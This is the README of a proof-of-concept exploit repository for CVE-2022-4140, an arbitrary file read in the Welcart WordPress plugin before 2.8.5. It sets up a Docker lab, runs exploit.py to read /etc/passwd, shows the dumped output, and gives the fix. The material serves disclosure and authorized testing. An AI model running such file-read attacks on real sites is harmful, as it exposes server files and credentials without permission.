
WordPress plugin Welcart e-Commerce < 2.8.5 - Arbitrary File Read
This repo contains a Proof of Concept(PoC) exploit for CVE-2022-4140.
This project is provided for educational purposes and authorized security testing only. Do not use it against systems that you do not own or have permission to test.
The plugin does not validate user input before using it to output the content of a file, which could allow unauthenticated attacker to read arbitrary files on the server
All versions of the plugin upto 2.8.4 are affected.
Pre-requisites: Docker and Docker compose installed
mkdir wordpress-docker
cd wordpress-docker
vim docker-compose.yml
services:
db:
image: mysql:8.0
container_name: wordpress-db
restart: unless-stopped
environment:
MYSQL_ROOT_PASSWORD: rootpassword
MYSQL_DATABASE: wordpress
MYSQL_USER: bala
MYSQL_PASSWORD: password
volumes:
- db_data:/var/lib/mysql
wordpress:
image: wordpress:latest
container_name: wordpress
restart: unless-stopped
depends_on:
- db
ports:
- "8080:80"
environment:
WORDPRESS_DB_HOST: db:3306
WORDPRESS_DB_USER: bala
WORDPRESS_DB_PASSWORD: password
WORDPRESS_DB_NAME: wordpress
volumes:
- wordpress_data:/var/www/html
volumes:
db_data:
wordpress_data:
sudo docker-compose up -d
svn checkout https://plugins.svn.wordpress.org/usc-e-shop/tags/2.8.4/
mv 2.8.4 usc-e-shop
sudo docker cp usc-e-shop wordpress:/var/www/html/wp-content/plugins/
git clone https://github.com/anirbala98/CVE-2022-4140.git
cd CVE-2022-4140/
pip install -r requirements.txt
python exploit.py <base_url> -f <file location> --disable-version-check
python exploit.py http://127.0.0.1/wordpress/ -f /etc/passwd
└─$ python exploit.py http://127.0.0.1/wordpress/ -f /etc/passwd
[*] Checking if target is vulnerable
[+] Plugin version detected: 2.8.4
[+] The target is vulnerable
[*] Attempting to read arbitrary file
root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
Upgrade the plugin to version 2.8.5.